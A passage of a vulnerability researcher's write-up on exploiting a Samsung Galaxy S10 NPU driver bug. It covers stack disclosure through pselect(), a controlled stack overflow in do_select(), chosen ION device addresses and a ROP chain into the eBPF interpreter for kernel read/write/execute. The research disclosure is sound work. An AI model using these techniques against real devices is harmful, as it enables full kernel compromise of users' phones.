In order to figure out which spilled register we'd need to target, I looked at __arch_copy_to_user() in IDA. Unfortunately, there's one other complication to make this technique work: due to unrolling, __arch_copy_to_user() will only enter a loop if the size is at least 128 bytes on entry. This means that we'll need to target a syscall that calls copy_to_user() with a size of at least 128 bytes.

Fortunately, it didn't take long to find several good stack disclosure candidates, such as the newuname() syscall:

SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)


    struct new_utsname tmp;


    memcpy(&tmp, utsname(), sizeof(tmp));


    if (copy_to_user(name, &tmp, sizeof(tmp)))

        return -EFAULT;



The new_utsname struct that gets copied out is 0x186 bytes, which means we should enter the looping path in __arch_copy_to_user(). When that access faults, the register containing the copy size 0x186 will be spilled to the stack, and we can change it to a very large value like 0x80610186 before unblocking the fault. To prevent the copyout from running off the end of the kernel stack, we will have the next page in userspace after the magic blocking page be unmapped, causing the __arch_copy_to_user() to terminate early and cleanly.

The write path

The above trick should work for reading past the end of a stack buffer; what about for writing?

Here again I ran into a new complication, and this one was significant: copy_from_user() will zero out any unused space in the buffer that was not successfully copied from userspace:

_copy_from_user(void *to, const void __user *from, unsigned long n)


    unsigned long res = n;


    if (likely(access_ok(VERIFY_READ, from, n))) {

        kasan_check_write(to, n);

        res = raw_copy_from_user(to, from, n);


    if (unlikely(res))

        memset(to + (n - res), 0, res);

    return res;


This means that copy_from_user() won't let us truncate the write early as we did with copy_to_user() by having an unmapped page after the blocking region. Instead, it will try to memset the memory past the end of the buffer to zero, all the way up to the modified size of at least 0x80500000. copy_from_user() is out.

Thankfully, there are some calls to the alternative function __copy_from_user(), which does not perform this unwanted memset. But these are much rarer, and thus we'll have a very limited selection of syscalls to target.

In fact, pretty much the only call to __copy_from_user() with a large size that I could find was in restore_fpsimd_context(), reached via the sys_rt_sigreturn() syscall. This syscall seems to be related to signal handling, and in particular restoring user context after returning from a signal handler. This particular __copy_from_user() call is responsible for copying in the floating-point register state (registers Q0 - Q31) after validating the signal frame on the user's stack.

The size parameter at this callsite is 512 (0x200) bytes, which is large enough to enter the looping path in __arch_copy_from_user(). However, the address of the floating point register state that is read from during the copy-in is part of the userspace thread's signal frame on the stack, so it would be very tricky to ensure that both

  1. the first access to the blocking page (which must be part of the thread's stack) is in the target call to __copy_from_user() rather than earlier in the signal frame parsing, and
  2. the address passed to __copy_from_user() is deep enough into the blocking page that we hit a subsequent unmapped page in userspace before overflowing off the end of the kernel stack.

These two requirements are in direct conflict: Since the signal frame before the floating-point register state will be accessed in parse_user_sigframe(), the first requirement effectively means we need to put the floating-point state at the very start of the blocking page, so that the values right before can be accessed without triggering the blocking fault. But at the same time, the second requirement forces us to put the floating-point state towards the end of the blocking page so that we can terminate the __arch_copy_from_user() before running off the end of the kernel stack and triggering a panic. It's impossible to satisfy both of these requirements.

At this point I started looking at alternative ways to use our primitive to work around this conflict. In particular, we know that the __arch_copy_from_user() size parameter on entry will be 0x200, that ION buffers have addresses like 0x80xx0000, and that our addition need not be aligned. So, what if we overlapped only the most-significant byte of the ION address with the least-significant byte of the size parameter?

When __arch_copy_to_user() faults, its registers will be spilled to memory in the order X0, X1, X2, and so on. Register X2 holds the size value, which in our case will be 0x200, and X1 stores the userspace address being copied from. If we assume the first 3 bytes of the userspace address are zero, then we get the following layout of X1 and X2 in memory:

          X1            |           X2

UU UU UU UU UU 00 00 00 | 00 02 00 00 00 00 00 00

Then, if we come in with our unaligned addition with a daddr of 0x80610000:

          X1            |           X2
00 00 61 | 80 02 00 00 00 00 00 00

Thus, we've effectively increased the value of X2 from 0x200 to 0x280, which should be large enough to corrupt the stack frame of sys_rt_sigreturn() but small enough to avoid running off the end of the kernel stack.

The consequence of using an unaligned addition like this is that we've also corrupted the value of X1, which stores the userspace address from which to copy in the data. Instead of the upper bytes being all 0, the top byte is now nonzero. Quite fortunately, however, this isn't a problem because the kernel was compiled with support for the Top Byte Ignore (TBI) architectural feature enabled for userspace, which means that the top byte of the pointer will be ignored for the purpose of address translation by the CPU.

This gives us a reasonably complete exploit flow:

  1. Create 2 "blocking pages" using proxy file descriptors.
  2. Map the first blocking page before an unmapped page, and invoke the newuname() syscall with a pointer towards the end of the first blocking page. The copy_to_user() will fault and block, waiting on the corresponding proxy fd.
  3. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_to_user().
  4. Fulfill the requested data on the first proxy fd, allowing the page fault to complete and resuming __arch_copy_to_user(). The copy-out will proceed past the ends of the stack buffer, disclosing the stack cookie and the return address, but stopping at the unmapped page.
  5. Create a fake signal stack frame around a mapping of the second blocking page and invoke the sys_rt_sigreturn() syscall.
  6. sys_rt_sigreturn() will call __copy_from_user() with size 0x200 and fault trying to access the blocking page.
  7. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_from_user(), but align the addition such that only the least significant byte of X2 is changed. This will bump the spilled value from 0x200 to 0x280.
  8. Fulfill the requested data on the second proxy fd, allowing the page fault to complete and resuming __arch_copy_from_user(). The copy-in will overflow the stack buffer, overwriting the return address.
  9. When sys_rt_sigreturn() returns, we will gain code execution.

Blocking problems

When I tried to implement this technique, I ran into a fatal problem: I couldn't seem to mmap() the proxy file descriptor in order to create the memory regions that would be used to block copy_to/from_user().

I checked with Jann, and he discovered that the SELinux policy change that would allow mapping the proxy file descriptors was quite recent, and unfortunately too new to be available on my device:

 # For app fuse.

-allow appdomain app_fuse_file:file { getattr read append write };

+allow appdomain app_fuse_file:file { getattr read append write map };

This change was committed in March of 2020, and apparently would not migrate to my device until after the NPU bug I was exploiting would be fixed. Thus, I couldn't rely on blocking copy_to/from_user() after all, and would need to find an alternative target.

Thankfully, due to his copious knowledge of Linux internals, Jann was quickly able to suggest a few different strategies worth investigating. Since this post is already quite long I'll avoid explaining each of them and jump directly to the one that was the most promising: select().

Revisiting the read

Since my previous strategy relied on the blocking memory region for both the stack disclosure (read) and stack buffer overflow (write) steps, I'd need to revisit both of them. But for right now, we'll focus on the read part.

The pselect() system call is an interesting target for our out-of-bounds addition primitive because it will deterministically block before calling copy_to_user() to copy out the contents of a stack buffer. Not only that, but the amount of memory to copy out to userspace is controllable rather than being hardcoded. Thus, we'll have an opportunity to modify the size parameter in a call to copy_to_user() while pselect() is blocked, and increasing the size should cause the kernel to disclose out-of-bounds stack memory.

Here's the relevant code from core_sys_select(), which implements the core logic of the syscall:

int core_sys_select(int n, fd_set __user *inp, fd_set __user *outp,

               fd_set __user *exp, struct timespec64 *end_time)



    /* Allocate small arguments on the stack to save memory and be faster */

    long stack_fds[SELECT_STACK_ALLOC/sizeof(long)];



     * We need 6 bitmaps (in/out/ex for both incoming and outgoing),

     * since we used fdset we need to allocate memory in units of

     * long-words.


    size = FDS_BYTES(n);

    bits = stack_fds;

    if (size > sizeof(stack_fds) / 6) {

        /* Not enough space in on-stack array; must use kmalloc */


        bits = kvmalloc(alloc_size, GFP_KERNEL);


    }      = bits;

    fds.out     = bits +   size;

    fds.ex      = bits + 2*size;

    fds.res_in  = bits + 3*size;

    fds.res_out = bits + 4*size;

    fds.res_ex  = bits + 5*size;

    // get_fd_set() calls copy_from_user()

    if ((ret = get_fd_set(n, inp, ||

        (ret = get_fd_set(n, outp, fds.out)) ||

        (ret = get_fd_set(n, exp, fds.ex)))

        goto out;

    zero_fd_set(n, fds.res_in);

    zero_fd_set(n, fds.res_out);

    zero_fd_set(n, fds.res_ex);

    // do_select() may block

    ret = do_select(n, &fds, end_time);


    // set_fd_set() calls __copy_to_user()

    if (set_fd_set(n, inp, fds.res_in) ||

        set_fd_set(n, outp, fds.res_out) ||

        set_fd_set(n, exp, fds.res_ex))

        ret = -EFAULT;



As you can see, the local variable n must be saved to the stack while do_select() blocks, which means that it can be modified before the call to set_fd_set() copies out the corresponding number of bytes to userspace. Also, if n is small, then the 256-byte stack_fds buffer will be used rather than a heap-allocated buffer.

This code actually looks a bit different when compiled in the kernel due to optimization and inlining. In particular, the variable n is not used during the subsequent calls to __arch_copy_to_user(), but rather a hidden variable with the value 8 * size allocated to register X22. Thus, wherever X22 gets spilled to the stack during the prologue of do_select(), that's the address we need to target to change the size passed to __arch_copy_to_user().

But there's one other unfortunate consequence we'll have to deal with when moving from the old "blocking page" technique to this new technique: Before, we were modifying the size to be copied out during the execution of __arch_copy_to_user() itself, after all the sanity checks had passed on the original (unmodified) value. Now, however, we're trying to pass the corrupted value directly to __copy_to_user(), which means we'll need to ensure that we don't trip any of the checks. In particular, __copy_to_user() has a call to check_object_size() which will fail if the copy-out extends beyond the bounds of the stack.

Thankfully, we've already solved this particular problem already when dealing with sys_rt_sigreturn(). Just like in that case, we can set the offset of our out-of-bounds addition such that only the least significant byte of the spilled X22 is modified. But for this to be compatible with the precondition for the write, that the initial value being modified is smaller than the size of the ION buffer, this means that we need the least significant byte of X22 to be 0.

Because core_sys_select() will stop using the stack_fds buffer if n is too large, this constraint actually admits only a single solution: n = 0. That is, we will need to call select() on 0 file descriptors, which will cause the value X22 = 0 to be stored to the stack when do_select() blocks, at which point we can use our out-of-bounds addition to increase X22 to 0x80.

Thankfully, the logic of core_sys_select() functions just fine with n = 0; even better, the stack_fds buffer is only zeroed for positive n, so bumping the copy-out size to 0x80 will allow us to read uninitialized stack buffer contents. So this technique should allow us to turn the out-of-bounds addition into a useful kernel stack disclosure.

Unfortunately, when I began implementing this, I ran into another significant problem. When the prologue of do_select() saves X22 to the stack, it places register X23 right before X22, and X23 contains a kernel pointer at this point. This messes up the precondition for our out-of-bounds addition, because the unaligned value overlapping the least significant byte of X22 will be too large:

          X23           |           X22

XX XX XX XX 80 ff ff ff | 00 00 00 00 00 00 00 00

In order for our precondition to be met, we'd need to have an ION buffer of size at least 0x00ffffff (really, 0x01000000 due to granularity). My impression was that ION memory is quite scarce; is it even possible to allocate an ION buffer that large?

It turns out, yes! I had just assumed that such a large allocation (16 MiB) would fail, but it turns out to work just fine. So, all we have to do is increase the size of the ION buffer initially allocated to 0x1000000, and we should be able to modify register X22.

What about X23, won't that register be corrupted? It will, but thankfully X23 happens to be unused by core_sys_select() after the call to do_select(), so it doesn't actually matter that we clobber it.

At last, we have a viable stack disclosure strategy!

  1. Allocate a 16 MiB ION buffer.
  2. Perform the vmalloc purge using binder fds.
  3. Spray binder vmallocs to consume all vmalloc holes down to size 0x5000, and cause vmalloc() to start allocating from fresh VA space.
  4. Spray thread stacks to fill any remaining 0x5000-byte holes leading up to the fresh VA space.
  5. Map the ION buffer into the fresh VA space by invoking the vulnerable ioctl.
  6. Spray thread stacks; these should land directly after the ION buffer mapping.
  7. Call pselect() from the thread directly after the ION buffer with with n = 0; this call will block for the specified timeout.
  8. Call ioctl() on the main thread to perform the out-of-bounds addition, targeting the value of X22 from core_sys_select(). Align the addition to bump the value from 0 to 0x80.
  9. When do_select() unblocks due to timeout expiry, the modified value of X22 will be passed to __copy_to_user(), disclosing uninitialized kernel stack contents to userspace.

And after a few false starts, this strategy turned out to work perfectly:

Samsung NPU driver exploit

ION 0x80850000 [0x01000000]

Allocated ION buffer

Found victim thread!

buf = 0x74ec863b30

pselect() ret = 0 Success

buf[00]:  0000000000000124

buf[08]:  0000000000000015

buf[10]:  ffffffc88f303b80

buf[18]:  ffffff8088adbdd0

buf[20]:  ffffffc89f935e00

buf[28]:  ffffff8088adbd10

buf[30]:  ffffff8088adbda8

buf[38]:  ffffff8088adbd90

buf[40]:  ffffff8008f814e8

buf[48]:  0000000000000000

buf[50]:  ffffffc800000000

By inspecting the leaked buffer contents, it appears that buf[38] is a stack frame pointer and buf[40] is a return address. Thus we now know both the address of the victim stack, from which we can deduce the address of the ION buffer mapping, and the address of a kernel function, which allows us to break KASLR.

Revisiting the write

Pretty much the only thing left to do is find a way to overflow a stack buffer using our primitive. Once we do this, we should be able to build a ROP chain that will give us some as-yet-unspecified kernel read/write capability.

For now, we won't worry about what to do after the overflow because ROP should be a sufficiently generic technique to implement whatever final read/write capability we want. Admittedly, for an iOS kernel exploit the choice of final capability would have substantial influence on the shape of the exploit flow. But this is because the typical iOS exploit achieves stable kernel read/write before kernel code execution, especially since the arrival of PAC. By contrast, if we can build a stack buffer overflow, we should be able to get ROP execution directly, which is in many ways more powerful than kernel read/write.

Actually, thinking about PAC and iOS gave me an idea.

When a userspace thread enters the kernel, whether due to a system call, page fault, IRQ, or any other reason, the userspace thread's register state needs to be saved in order to be able to resume its execution later. This includes the general-purpose registers X0 - X31 as well as SP, PC, and SPSR ("Saved Program Status Register", alternatively called CPSR or PSTATE). These values get saved to the end of the thread's kernel stack right at the beginning of the exception vector.

When Apple implemented their PAC-based kernel control flow integrity on iOS, they needed to take care that the saved value of SPSR could not be tampered with. The reason is that SPSR is used during exception return to specify the exception level to return to: this could be EL0 when returning to userspace, or EL1 when returning to kernel mode. If SPSR weren't protected, then an attacker with a kernel read/write primitive could modify the saved value of SPSR to cause a thread that would return to userspace (EL0) to instead return to EL1, thereby breaking the kernel's control flow integrity (CFI).

The Samsung Galaxy S10 does not have PAC, and hence SPSR is not protected. This is not a security issue because kernel CFI isn't a security boundary on this device. However, it does mean that this attack could be used to gain kernel code execution.

The idea of targeting the saved SPSR was appealing because we would no longer need the buffer overflow step to execute our ROP payload: assuming we could get an ION buffer allocated with a carefully chosen device address, we could modify SPSR directly using our out-of-bounds addition primitive.

Concretely, when a user thread invokes a syscall, the saved SPSR value might be something like 0x20000000. The least significant 4 bits of SPSR specify the exception level from which the exception was taken: in this case, EL0. A normal kernel thread might have a CPSR value of 0x80400145; in this case, the "5" means that the thread is running at EL1 and on the interrupt stack (SP_EL1).

Now imagine that we could get our 0x01000000-byte ION buffer allocated with a device address of 0x85000000. We'll also assume that we've somehow already managed to set the user thread's saved PC register to a kernel pointer. The saved user PC and SPSR registers look like this on the stack:

          PC            |          SPSR
XX XX XX 0X 80 FF FF FF | 00 00 00 20 00 00 00 00

Using our out-of-bounds addition primitive to change just the least significant byte of SPSR would yield the following:

          PC            |          SPSR
XX XX XX 0X 80
FF FF FF | 85 00 00 20 00 00 00 00

Hence, we would have changed SPSR from 0x20000000 to 0x20000085, meaning that once the syscall returns, we will start executing at EL1!

Of course, that still leaves a few questions open: How do we get our ION buffer allocated at the desired device address? How do we set the saved PC value to a kernel pointer? We'll address these in turn.

Getting the ION buffer allocated at the desired device address seemed the most urgent, since it is quite integral to this technique. In my testing it seemed that ION buffers had decently (but not perfectly) regular allocation patterns. For example, if you had just allocated an ION buffer of size 0x2000 that had device address 0x80500000, then the next ION buffer was usually allocated with device address 0x80610000.

I played around with the available parameters a lot, hoping to discover an underlying logic that would allow me to deterministically predict ION daddrs. For instance, if the size of the first ION allocation was between 0x1000 and 0x10000 bytes, then the next allocation would usually be made at a device address 0x110000 bytes later, while if the first ION allocation was between 0x11000 and 0x20000 bytes, the next allocation would usually be at a device address 0x120000 bytes later. These patterns seemed to suggest that predictability was tantalizingly close; however, try as I might, I couldn't seem to eliminate the variations from the patterns I observed.

Eventually, by sheer random luck I happened to stumble upon a technique during one of my trials that would quite reliably allocate ION buffers at addresses of my choosing. Thus, we can now assume as part of our out-of-bounds addition primitive that we have control to choose the ION buffer's device address. Furthermore, the mask of available ION daddrs using this technique is much larger than I'd initially thought: 0x[89]xxxx000.

Now, as to the question of how we'll set the saved PC value to a kernel pointer: The simplest approach would just be to jump to that address from userspace; this would work to set the value, but it was not clear to me whether we'd be able to block the thread in the kernel in this state long enough to modify the SPSR using our addition primitive from the main thread. Instead, on recommendation from my team I used the ptrace() API, which via the PTRACE_GETREGSET command provides similar functionality to XNU's thread_set_state().

Total meltdown

My first test after implementing this strategy was to set PC to the address of an instruction that would dereference an invalid memory address. The idea was that running this test should cause a kernel panic right away, since the exception return would start running in kernel mode. Then I could check the panic log to see if all the registers were being set as I expected.

Unfortunately, my first test didn't panic: the syscall whose SPSR was corrupted just seemed to hang, never returning to userspace. And after several seconds of this (during which the phone was fully responsive), the phone would eventually reboot with a message about a watchdog timeout.

This seemed quite bizarre to me. If SPSR wasn't being set properly, the syscall should return to EL0, not EL1, and thus we shouldn't be able to cause any sort of kernel crash. On the other hand, I was certain that PC was set to the address of a faulting instruction, so if SPSR were being set properly, I'd expect a kernel panic, not a hard hang triggering a watchdog timeout. What was going on?

Eventually, Jann and I discovered that this device had the ARM64_UNMAP_KERNEL_AT_EL0 CPU feature set, which meant that the faulting instruction I was trying to jump to was being unmapped before the syscall return. Working around this seemed more trouble than it was worth: instead, I decided to abandon SPSR and go back to looking for ways to trigger a stack buffer overflow.

Revisiting the write (again)

So, once again I was back to finding a way to use the out-of-bounds addition to create a stack buffer overflow.

This was the part of the exploit development process that I was least enthusiastic about: searching through the Linux code to find specific patterns that would give me the primitives I needed. Choosing to focus on stack frames rather than heap objects certainly helped narrow the search space, but it's still tedious. Thus, I decided to focus on the parts of the kernel I'd already grown familiar with.

The pattern that I was looking for was any place that blocks before copying data to the stack, where the amount of data to be copied was stored in a variable that would be saved during the block. Ideally, this would be a call to copy_from_user(), but I failed to find any useful instances of copy_from_user() being called after a blocking operation.

However, a horrible, horrible idea occurred to me while looking once again at the pselect() syscall, and in particular at the implementation of do_select():

static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)



    retval = 0;

    for (;;) {


        inp = fds->in; outp = fds->out; exp = fds->ex;

        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;

        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {


            in = *inp++; out = *outp++; ex = *exp++;

            all_bits = in | out | ex;

            if (all_bits == 0) {

                i += BITS_PER_LONG;



            for (j = 0; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {

                struct fd f;

                if (i >= n)


                if (!(bit & all_bits))


                f = fdget(i);

                if (f.file) {


                    if (f_op->poll) {


                        mask = (*f_op->poll)(f.file, wait);



                    if ((mask & POLLIN_SET) && (in & bit)) {

                        res_in |= bit;







            if (res_in)

                *rinp = res_in;

            if (res_out)

                *routp = res_out;

            if (res_ex)

                *rexp = res_ex;




        if (retval || timed_out || signal_pending(current))



        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,

                       to, slack))

            timed_out = 1;



    return retval;


pselect() is able to check file descriptors for 3 types of readiness: reading (in fds), writing (out fds), and exceptional conditions (ex fds). If none of the file descriptors in the 3 fdsets are ready for the corresponding operations, then do_select() will block in poll_schedule_timeout() until either the timeout expires or the status of one of the selected fds changes.

Imagine what happens if, while do_select() is blocked in poll_schedule_timeout(), we use our out-of-bounds addition primitive to change the value of n. We already know from our analysis of core_sys_select() that if n was sufficiently small to begin with, then the stack_fds array will be used instead of allocating a buffer on the heap. Thus, in, out, and ex may reside on the stack. Once poll_schedule_timeout() unblocks, do_select() will iterate over all file descriptor numbers from 0 to (the corrupted value of) n. Towards the end of this loop, inp, outp, and exp will be read out-of-bounds, while rinp, routp, and rexp will be written out of bounds. Thus, this is actually a stack buffer overflow. And since the values written to rinp, routp, and rexp are determined based on the readiness of file descriptors, we have at least some hope of controlling the data that gets written.

Sizing the overflow

So, in theory, we could target pselect() to create a stack buffer overflow using our out-of-bounds addition. There are still a lot of steps between that general idea and a working exploit.

Let's begin just by trying to understand the situation we're in a bit more precisely. Looking at the function prologues in IDA, we can determine the stack layout after the stack_fds buffer:

A diagram showing the call stack of core_sys_select(). The topmost stack frame is core_sys_select(), followed by SyS_pselect6(), followed by el0_sync_64.

The stack layout of core_sys_select() and all earlier frames in the call stack. The 256-byte stack_fds buffer out of which we will overflow is 0x348 bytes from the end of the stack and followed by a stack guard and return address.

There are two major constraints we're going to run into with this buffer overflow: controlling the length of the overflow and controlling the contents of the overflow. We'll start with the length.

Based on the depth of the stack_fds buffer in the kernel stack, we can only write 0x348 bytes into the buffer before running off the end of the stack and triggering a kernel panic. If we assume a maximal value of n = 0x140 (which will be important when controlling the contents of the overflow), then that means we need to stop processing at inp = 0x348 - 5 * 0x28 = 0x280 bytes into the buffer, which will position rexp just off the end of the stack. This corresponds to a maximum corrupted value of n of 8 * 0x280 = 0x1400.

So, how do we choose an ION buffer daddr such that adding the daddr into n = 0x140 at some offset will yield a value significantly greater than 0x140 but less than 0x1400?

Unfortunately, the math on this doesn't work out. Even if we choose from the expanded range of ION device addresses 0x[89]xxxx000, there is no address that can be added to 0x140 at a particular offset to produce a 32-bit value between 0x400 and 0x1400.

Nevertheless, we do still have another option available to us: 2 ION buffers! If we can choose the device address of a single ION buffer, theoretically we should be able to repeat the feat to choose the device addresses of 2 ION buffers together; can we find a pair of daddrs that can be added to 0x140 at particular offsets to produce a 32-bit value between 0x400 and 0x1400?

It turns out that adding in a second independent daddr now gives us enough degrees of freedom to find a solution. For example, consider the daddrs 0x8qrst000 and 0x8wxyz000 being added into 0x140 at offsets 0 and +1, respectively. Looking at how the bytes align, it's clear that the only sum less than 0x1400 will be 0x1140. Thus, we can derive a series of relations between the digits:

carry       11   1

+     00 z0 xy  8w

+  00 t0 rs 8q

   40 01 00 00  00 00 00 00


   40 11 00 00  ??

t = 1

s = 0

z+r = 0 OR z+r = 10

ASSUME z+r = 10

1+y+q = 10 => y+q = f

1+x+8 = 10 => x = 7

In this case, we discover that daddrs 0x8qr01000 and 0x8w7yz000 will be a solution so long as q + y = 0xf and r + z = 0x10. For example, 0x81801000 and 0x827e8000 are a solution:

carry       11   1

+     00 80 7e  82

+  00 10 80 81

   40 01 00 00  00 00 00 00


   40 11 00 00  83

corrupted 32-bit n is 0x1140

So, we'll need to tweak our original heap groom slightly to map both ION buffers back-to-back before spraying the kernel thread stacks.

Controlling the contents

Using 2 ION buffers with carefully chosen device addresses allows us to control the size of the stack buffer overflow. Meanwhile, the contents of the overflow are the output of the pselect() syscall, which we can control because we can control which file descriptors in our process are ready for various types of operations. But once we overflow past the original value of n, we run into a problem: we start reading our input data from the data previously written to the output buffer.

A diagram showing the progression of the stack buffer overflow out of the stack_fds buffer and down the stack.

Corrupting the value of n will cause do_select() to keep processing inp, outp, and exp past their original bounds. Eventually the output cursor rinp will start overflowing out of the stack_fds buffer entirely, overwriting the return address. But before that happens, inp will start consuming the previous output of rinp.

To make the analysis simpler, we can ignore out, ex, rout, and rex to focus exclusively on in and rin. The reason for this is that rout and rex will eventually be overwritten by rin, so it doesn't really matter what they write; if the overflow continues for a sufficient distance, only the output of rin matters.

Using the assumed value of n = 0x140, each of the in, out, ex, rin, rout, rex buffers is 0x28 bytes, so after processing 3 * n = 0x3c0 file descriptors, inp (the input pointer) will start reading from rin (the output buffer), and this will continue as the out-of-bounds write progresses down the stack. By the semantics of select(), each bit in rinp is only written with a 1 if both the corresponding bit in inp was a 1 and the corresponding file descriptor was readable. Thus, once we've written a 0 bit at any location, every bit at a multiple of 0x3c0 bits later will also be 0. This introduces a natural cycle in our overflow that constrains the output.

It's also worth noting that if you look back at do_select(), rinp is only written if the full 64-bit value to write is nonzero. Thus, if any 64-bit output value is 0 (i.e., all 64 fds in the long are either not selected on or not readable), then the corresponding stack location will be left intact.

A diagram showing the cyclical dependency of bit values that can be written using this buffer overflow. In order to set bit X to 1, we need to ensure that bit X - 0x3c0 is also 1 and that file descriptor X - 0x3c0 is readable. If X - 0x3c0 is 0, then do_select() will not select on file descriptor X - 0x3c0, and the output at X will be 0; however, if all 64 output bits in X's long are 0, then no output is written and the value of X will be unchanged.

Because of the 3 * 0x28 = 0x78-byte cycle length, we can treat this primitive as the ability to write up to 15 controlled 64-bit values into the stack, each at a unique offset modulo 0x78, while leaving stack values at the remaining offsets modulo 0x78 intact. This is a conservative simplification, since our primitive is somewhat more flexible than this, but it's useful to visualize our primitive this way.

Under this simplification, we can describe the out-of-bounds write as 15 (offset, value) pairs, where offset is the offset from the start of the stack_fds array in bytes (which must be a multiple of 8 and must be unique mod 0x78) and value is the 64-bit value to be written at that offset. For each (offset, value) pair, we need to set to 1 every bit in each "preimage" of value from an earlier cycle.

To simplify things even further, let's regard the concatenation of the input fdsets in, out, and ex as a single input fdset, just as it appears on the kernel stack in the stack_fds buffer once we've corrupted n.

The simplest solution is to have the "preimage" of each value be value itself, which can be done by setting the portion of the input fdset at offset % 0x78 to value for each (offset, value) pair and by making every file descriptor from 0 to 0x1140 be readable. Since we'll only be selecting on the fds that correspond to 1 bits in value and since every fd is readable, this will mirror the entire input buffer (consisting of the 15 values at their corresponding offsets) down the kernel stack repeatedly. This will trivially ensure that value gets placed at offset because value will be written to every offset in the kernel stack that is the same as offset mod 0x78.

A diagram showing the input buffer being repeatedly mirrored down the stack.

By making all of the first 0x1140 file descriptors readable, the input buffer's 15 longs will be mirrored down the stack, repeating every 0x3c0 bits.

Using a slightly more complicated solution, however, we can limit the depth of the stack corruption. Instead, we'll have the preimage of each value be ~0 (i.e., all 64 bits set), and use the readability of each file descriptor to control the bits that get written. That way, once we've written the value at the correct offset, the fds corresponding to subsequent cycles can be made non-readable, thereby preventing the corruption from continuing down the stack past the desired depth of each write.

This still leaves one more question about the mechanics of the stack buffer overflow: poll_schedule_timeout() will return as soon as any file descriptor becomes readable, so how can we make sure that all the fds for all the 1 bits become readable at the same time? Fortunately this has an easy solution: create 2 pipes, one for all 0 bits and one for all 1 bits, and use dup2() to make all the fds we'll be selecting on be duplicates of the read ends of these pipes. Writing data to the "1 bits" pipe will cause poll_schedule_timeout() to unblock and all the "1 bits" fds will be readable (since they're all dups of the same underlying file). The only thing we need to be careful about is to ensure that at least one of the original in file descriptors (fds 0-0x13f) is a "1 bit" dup, or else poll_schedule_timeout() won't notice the status change when we write to the "1 bits" pipe.

Combining all of these ideas together, we can finally control the contents of the buffer overflow, clobbering the return address (while leaving the stack guard intact!) to execute a small ROP payload.

The ultimate ROP

Finally, it's time to consider our ROP payload. Because we can write at most 15 distinct 64-bit values into the stack via our overflow (2 of which we've already used), we'll need to be careful about keeping the ROP payload small.

When I mentioned this progress to Jann, he suggested that I check the function ___bpf_prog_run(), which he described as the ultimate ROP gadget. And indeed, if your kernel has it compiled in, it does appear to be the ultimate ROP gadget!

___bpf_prog_run() is responsible for interpreting eBPF bytecode that has already been deemed safe by the eBPF verifier. As such, it provides a number very powerful primitives, including:

  1. arbitrary control flow in the eBPF program;
  2. arbitrary memory load;
  3. arbitrary memory store;
  4. arbitrary kernel function calls with up to 5 arguments and a 64-bit return value.

So how can we start executing this function with a controlled instruction array as quickly as possible?

First, it's slightly easier to enter ___bpf_prog_run() through one of its wrappers, such as __bpf_prog_run32(). The wrapper takes just 2 arguments rather than 3, and of those, we only need to control the second:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

The insn argument is passed in register X1, which means we'll need to find a ROP gadget that will pop a value off the stack and move it into X1. Fortunately, the following gadget from the end of the current_time() function gives us control of X1 indirectly via X20:

FFFFFF8008294C20     LDP     X29, X30, [SP,#0x10+var_s0]

FFFFFF8008294C24     MOV     X0, X19

FFFFFF8008294C28     MOV     X1, X20

FFFFFF8008294C2C     LDP     X20, X19, [SP+0x10+var_10],#0x20

FFFFFF8008294C30     RET

The reason this works is that X20 was actually popped off the stack during the epilogue of core_sys_select(), which means that we already have control over X20 by the time we execute the first hijacked return. So executing this gadget will move the value we popped into X20 over to register X1. And since this gadget reads its return address from the stack, we'll also have control over where we return to next, meaning that we can jump right into __bpf_prog_run32() with our controlled X1.

The only remaining question is what value to place in X1. Fortunately, this also has a very simple answer: the ION buffers are mapped shared between userspace and the kernel, and we already disclosed their location when we leaked the uninitialized stack_fds buffer contents before. Thus, we can just write our eBPF program into the ION buffer and pass that address to __bpf_prog_run32()!

For simplicity, I had the eBPF implement a busy-poll of the shared memory to execute commands on behalf of the userspace process. The eBPF program would repeatedly read a value from the ION buffer and perform either a 64-bit read, 64-bit write, or 5-argument function call based on the value that was read. This gives us an incredibly simple and reliable kernel read/write/execute primitive.

Even though the primitive was hacky and the system was not yet stable, I decided to stop developing the exploit at this point because my read/write/execute primitive was sufficiently powerful that subsequent exploitation steps would be fully independent of the original bug. I felt that I had achieved the goal of exploring the differences between kernel exploitation on Android and iOS.


So, what are my takeaways from developing this Android exploit?

Overall, the quality of the hardware mitigations on the Samsung Galaxy S10 was much stronger than I had expected. My uninformed expectation about the state of hardware mitigation adoption on Android devices was that it lagged significantly behind iOS. And in broad strokes that's true: the iPhone XS's A12 SOC supports ARMv8.3-A compared to the Qualcomm Snapdragon 855's ARMv8.2-A, and the A12 includes a few Apple-custom mitigations (KTRR, APRR+PPL) not present in the Snapdragon SOC. However, the mitigation gap was substantially smaller than I had been expecting, and there were even a few ways that the Galaxy S10 supported stronger mitigations than the iPhone XS, for instance by using unprivileged load/store operations during copy_from/to_user(). And as interesting as Apple's custom mitigations are on iOS, they would not have blocked this exploit from obtaining kernel read/write.

In terms of the software, I had expected Android to provide significantly weaker and more limited kernel manipulation primitives (heap shaping, target objects to corrupt, etc) than what's provided by the Mach microkernel portion of XNU, and this also seems largely true. I suspect that part of the reason that public iOS exploits all seem to follow very similar exploit flows is that the pre- and post-exploitation primitives available to manipulate the kernel are exceptionally powerful and flexible. Having powerful manipulation primitives allows you to obtain powerful exploitation primitives more quickly, with less of the exploit flow specific to the exact constraints of the bug. In the case of this Android exploit, it's hard for me to speak generally given my lack of familiarity with the platform. I did manage to find good heap manipulation primitives, so the heap shaping part of the exploit was straightforward and generic. On the other hand, I struggled to find stack frames amenable to manipulation, which forced me to dig through lots of technical constraints to find strategies that would just barely work. As a result, the exploit flow to get kernel read/write/execute is highly specific to the underlying vulnerability until the last step. I'm thus left feeling that there are almost certainly much more elegant ways to exploit the NPU bugs than the strategy I chose.

Despite all these differences between the two platforms, I was overall quite surprised with the similarities and parallels that did emerge. Even though the final exploit flow for this NPU bug ended up being quite different, there were many echoes of the oob_timestamp exploit along the way. Thus my past experience developing iOS kernel exploits did in fact help me come up with ideas worth trying on Android, even if most of those ideas didn't pan out.

Introducing the In-the-Wild Series

